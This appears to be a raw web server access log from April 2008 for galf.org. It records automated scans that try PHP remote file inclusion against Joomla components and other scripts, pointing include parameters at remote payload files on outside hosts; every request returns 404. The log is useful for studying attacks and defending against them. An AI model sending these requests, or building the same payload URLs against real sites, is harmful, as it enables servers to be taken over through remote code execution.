65.36.177.149 - - [27/Apr/2008:18:29:34 -0700] "GET /logs/index2.php?x=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
75.126.115.170 - - [27/Apr/2008:18:30:13 -0700] "GET /logs/access_080324.log/components/com_performs/performs.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.115.170 - - [27/Apr/2008:18:30:23 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
200.160.251.134 - - [27/Apr/2008:18:30:29 -0700] "GET /logs/access_070924.log/index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.160.251.134 - - [27/Apr/2008:18:30:30 -0700] "GET /index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.160.251.134 - - [27/Apr/2008:18:30:30 -0700] "GET /logs/index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.165.216.146 - - [27/Apr/2008:18:30:52 -0700] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:30:55 -0700] "GET /logs/access.log/pagina.php?type=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:30:55 -0700] "GET /pagina.php?type=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:30:55 -0700] "GET /logs/pagina.php?type=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:30:55 -0700] "GET /logs/access_071231.log/pagina.php?type=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
200.213.0.1 - - [27/Apr/2008:18:30:57 -0700] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.130.79.136 - - [27/Apr/2008:18:32:18 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sorncomputer.com/head.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
201.130.79.136 - - [27/Apr/2008:18:32:18 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sorncomputer.com/head.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
201.130.79.136 - - [27/Apr/2008:18:32:18 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sorncomputer.com/head.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
67.228.55.26 - - [27/Apr/2008:18:32:35 -0700] "GET //ashnews.php?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
67.228.55.26 - - [27/Apr/2008:18:33:27 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:34:12 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:34:13 -0700] "GET //ashnews.php?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:34:13 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
64.179.90.54 - - [27/Apr/2008:18:34:29 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
64.179.90.54 - - [27/Apr/2008:18:34:29 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
64.179.90.54 - - [27/Apr/2008:18:34:29 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
67.228.55.26 - - [27/Apr/2008:18:35:02 -0700] "GET //ashnews.php?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.115.170 - - [27/Apr/2008:18:35:42 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.115.170 - - [27/Apr/2008:18:35:43 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
72.89.191.68 - - [27/Apr/2008:18:36:16 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
72.89.191.68 - - [27/Apr/2008:18:36:16 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
72.89.191.68 - - [27/Apr/2008:18:36:21 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
72.89.191.68 - - [27/Apr/2008:18:36:21 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:38:04 -0700] "GET /logs/access_071231.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:38:04 -0700] "GET /logs/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:38:48 -0700] "GET //citywriter/head.php?path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
210.109.102.108 - - [27/Apr/2008:18:38:55 -0700] "GET /logs/access.log/main.php?page=http://h.hagag.free.fr/htdocs/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_dab934a7404e6c97e48f51f01088b1ff?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
210.109.102.108 - - [27/Apr/2008:18:38:56 -0700] "GET /main.php?page=http://h.hagag.free.fr/htdocs/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_dab934a7404e6c97e48f51f01088b1ff?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
210.109.102.108 - - [27/Apr/2008:18:38:56 -0700] "GET /logs/main.php?page=http://h.hagag.free.fr/htdocs/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_dab934a7404e6c97e48f51f01088b1ff?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
213.246.51.45 - - [27/Apr/2008:18:39:09 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.14.1.101 - - [27/Apr/2008:18:40:13 -0700] "GET /logs/access_080113.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.31.156.194 - - [27/Apr/2008:18:42:23 -0700] "GET /logs/access_071203.log//mcf.php?content=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.156.194 - - [27/Apr/2008:18:42:23 -0700] "GET //mcf.php?content=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.156.194 - - [27/Apr/2008:18:42:23 -0700] "GET /logs//mcf.php?content=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.156.194 - - [27/Apr/2008:18:42:24 -0700] "GET /logs/access_071203.log//mcf.php?content=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.156.194 - - [27/Apr/2008:18:42:24 -0700] "GET //mcf.php?content=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.156.194 - - [27/Apr/2008:18:42:24 -0700] "GET /logs//mcf.php?content=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.17.1.143 - - [27/Apr/2008:18:42:25 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "galf.org"
85.17.1.143 - - [27/Apr/2008:18:42:26 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "galf.org"
85.17.1.143 - - [27/Apr/2008:18:42:26 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "galf.org"
87.15.107.13 - - [27/Apr/2008:18:42:49 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.15.107.13 - - [27/Apr/2008:18:42:50 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:42:56 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:42:56 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
87.15.107.13 - - [27/Apr/2008:18:43:04 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
67.228.55.26 - - [27/Apr/2008:18:43:16 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
210.109.102.108 - - [27/Apr/2008:18:43:35 -0700] "GET /logs/access.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
81.31.156.194 - - [27/Apr/2008:18:43:35 -0700] "GET /logs/access_071203.log//mcf.php?content=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.156.194 - - [27/Apr/2008:18:43:35 -0700] "GET /logs/access_071203.log//mcf.php?content=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.156.194 - - [27/Apr/2008:18:43:35 -0700] "GET //mcf.php?content=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.156.194 - - [27/Apr/2008:18:43:36 -0700] "GET //mcf.php?content=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.156.194 - - [27/Apr/2008:18:43:36 -0700] "GET /logs//mcf.php?content=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.156.194 - - [27/Apr/2008:18:43:36 -0700] "GET /logs//mcf.php?content=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.109.102.108 - - [27/Apr/2008:18:43:36 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
210.109.102.108 - - [27/Apr/2008:18:43:36 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
81.31.156.194 - - [27/Apr/2008:18:43:47 -0700] "GET /logs/access_071224.log//mcf.php?content=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.156.194 - - [27/Apr/2008:18:43:47 -0700] "GET /logs/access_071224.log//mcf.php?content=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.205.76.134 - - [27/Apr/2008:18:44:28 -0700] "GET /logs/access_071203.log//agendax/addevent.inc.php?agendax_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.205.76.134 - - [27/Apr/2008:18:44:28 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.205.76.134 - - [27/Apr/2008:18:44:28 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.205.76.134 - - [27/Apr/2008:18:44:28 -0700] "GET /logs/access_071008.log//agendax/addevent.inc.php?agendax_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
81.31.156.194 - - [27/Apr/2008:18:44:50 -0700] "GET //mcf.php?content=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.156.194 - - [27/Apr/2008:18:45:55 -0700] "GET //mcf.php?content=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:46:23 -0700] "GET /logs/access_071203.log//agendax/addevent.inc.php?agendax_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:46:23 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:46:24 -0700] "GET /logs/access_071008.log//agendax/addevent.inc.php?agendax_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
200.87.179.130 - - [27/Apr/2008:18:46:48 -0700] "GET //inc/header.php/step_one.php?server_inc=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
200.87.179.130 - - [27/Apr/2008:18:46:48 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:47:07 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:47:08 -0700] "GET /logs/access_071015.log//newspublish/include.php?path%5Bdocroot%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:47:08 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:47:08 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
81.31.156.194 - - [27/Apr/2008:18:47:21 -0700] "GET /logs/access_080107.log//mcf.php?content=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.156.194 - - [27/Apr/2008:18:47:21 -0700] "GET /logs/access_080107.log//mcf.php?content=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:48:03 -0700] "GET /logs/access_071231.log//citywriter/head.php?path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:48:03 -0700] "GET //citywriter/head.php?path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:48:03 -0700] "GET /logs//citywriter/head.php?path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:48:14 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
203.116.91.54 - - [27/Apr/2008:18:48:50 -0700] "GET /logs/access_070917.log//vwar//includes/functions_install.php?vwar_root=http://h1.ripway.com/sun/modul/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.116.91.54 - - [27/Apr/2008:18:48:51 -0700] "GET //vwar//includes/functions_install.php?vwar_root=http://h1.ripway.com/sun/modul/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.116.91.54 - - [27/Apr/2008:18:48:52 -0700] "GET /logs//vwar//includes/functions_install.php?vwar_root=http://h1.ripway.com/sun/modul/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:51:23 -0700] "GET /logs/access_080121.log//impex/ImpExData.php?systempath=ftp://87.224.18.26/rspn.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:51:23 -0700] "GET //impex/ImpExData.php?systempath=ftp://87.224.18.26/rspn.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:51:23 -0700] "GET /logs//impex/ImpExData.php?systempath=ftp://87.224.18.26/rspn.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:51:24 -0700] "GET /logs/access_080121.log//impex/ImpExData.php?systempath=ftp://87.224.18.26/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:51:24 -0700] "GET //impex/ImpExData.php?systempath=ftp://87.224.18.26/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:51:25 -0700] "GET /logs//impex/ImpExData.php?systempath=ftp://87.224.18.26/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.205.214.163 - - [27/Apr/2008:18:51:29 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/mv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.205.214.163 - - [27/Apr/2008:18:51:29 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/mv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.205.214.163 - - [27/Apr/2008:18:51:30 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/mv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:52:07 -0700] "GET /logs/access_070806.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://87.224.18.26/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:52:07 -0700] "GET /logs/access_070806.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://87.224.18.26/rspn.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:52:07 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://87.224.18.26/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:52:07 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://87.224.18.26/rspn.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:52:08 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://87.224.18.26/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:52:08 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://87.224.18.26/rspn.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.234.21 - - [27/Apr/2008:18:52:20 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.234.21 - - [27/Apr/2008:18:52:20 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:52:26 -0700] "GET /logs/access_070730.log//mygallery/myfunctions/mygallerybrowser.php?myPath=ftp://87.224.18.26/rspn.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:52:26 -0700] "GET /logs/access_070730.log//mygallery/myfunctions/mygallerybrowser.php?myPath=ftp://87.224.18.26/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:52:26 -0700] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=ftp://87.224.18.26/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:52:26 -0700] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=ftp://87.224.18.26/rspn.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:52:26 -0700] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=ftp://87.224.18.26/rspn.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:52:26 -0700] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=ftp://87.224.18.26/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:52:41 -0700] "GET /logs/access_080107.log//mygallery/myfunctions/mygallerybrowser.php?myPath=ftp://87.224.18.26/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:52:41 -0700] "GET /logs/access_080107.log//mygallery/myfunctions/mygallerybrowser.php?myPath=ftp://87.224.18.26/rspn.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:53:22 -0700] "GET /logs/access_071231.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:53:22 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:53:22 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
85.214.109.12 - - [27/Apr/2008:18:53:34 -0700] "GET /logs/access_070903.log//impex/ImpExData.php?systempath=ftp://87.224.18.26/rspn.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:53:53 -0700] "GET /logs/access_071210.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
